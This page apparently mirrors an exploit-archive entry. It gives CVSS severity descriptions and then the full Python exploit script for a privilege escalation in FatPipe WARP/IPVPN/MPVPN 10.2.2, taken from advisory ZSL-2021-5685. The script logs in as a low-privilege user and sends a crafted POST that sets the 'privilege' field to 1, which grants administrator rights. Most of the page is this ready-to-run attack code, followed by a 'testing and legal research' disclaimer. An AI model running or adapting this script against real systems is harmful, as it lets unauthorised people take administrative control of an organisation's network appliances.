The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Privilege Escalation
#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
# 10.2.2r38
# 10.2.2r25
# 10.2.2r10
# 10.1.2r60p82
# 10.1.2r60p71
# 10.1.2r60p65
# 10.1.2r60p58s1
# 10.1.2r60p58
# 10.1.2r60p55
# 10.1.2r60p45
# 10.1.2r60p35
# 10.1.2r60p32
# 10.1.2r60p13
# 10.1.2r60p10
# 9.1.2r185
# 9.1.2r180p2
# 9.1.2r165
# 9.1.2r164p5
# 9.1.2r164p4
# 9.1.2r164
# 9.1.2r161p26
# 9.1.2r161p20
# 9.1.2r161p17
# 9.1.2r161p16
# 9.1.2r161p12
# 9.1.2r161p3
# 9.1.2r161p2
# 9.1.2r156
# 9.1.2r150
# 9.1.2r144
# 9.1.2r129
# 7.1.2r39
# 6.1.2r70p75-m
# 6.1.2r70p45-m
# 6.1.2r70p26
# 5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#
import sys
import time#######
import requests################
requests.packages.urllib3.disable_warnings()
if len(sys.argv) !=2:
print
print("********************************************************")
print("* *")
print("* Privilege escalation from USER to ADMINISTRATOR role *")
print("* in *")
print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
print("* *")
print("* ZSL-2021-5685 *")
print("* *")
print("********************************************************")
print("\n[POR] Usage: ./escalator.py [IP]")
sys.exit()
ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")
sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
'Accept' :'application/json, text/javascript, */*; q=0.01',
'X-Requested-With':'XMLHttpRequest',
'Sec-Ch-Ua-Mobile':'?0',
'User-Agent' :'Fatnet/1.b',
'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' :'https://'+ajpi,
'Sec-Fetch-Site' :'same-origin',
'Sec-Fetch-Mode' :'cors',
'Sec-Fetch-Dest' :'empty',
'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
'Accept-Encoding' :'gzip, deflate',
'Accept-Language' :'en-US,en;q=0.9',
'Connection' :'close'}
juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
if not 'success' in alo.text:
print('[GRE] Login error.')
sys.exit()
else:
print('[POR] Authentication successful.')
print('[POR] Climbing the ladder...')
sluba='''
|| || .--._
||====|| __ '---._)
|| ||"")\ Q Q )
||====|| =_/ o /
|| || | \_.-;-'-,._
||====|| | ' o---o )
|| || \ /H __H\ /
||====|| '-' \"")\/ |
|| || _ |_='-)_/
||====|| / '. )
|| || / /
||====|| |___/\| /
|| || |_| | |
||====|| / ) \\ \\
|| || (__/ \___\\
||====|| \_\\
|| || / )
||====|| (__/
'''
for k in sluba:
sys.stdout.write(k)
sys.stdout.flush()
time.sleep(0.01)
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
if not 'true' in stanje.text:
print('\n[GRE] Something\'s fishy!')
sys.exit()
else:
print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
sys.exit()
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum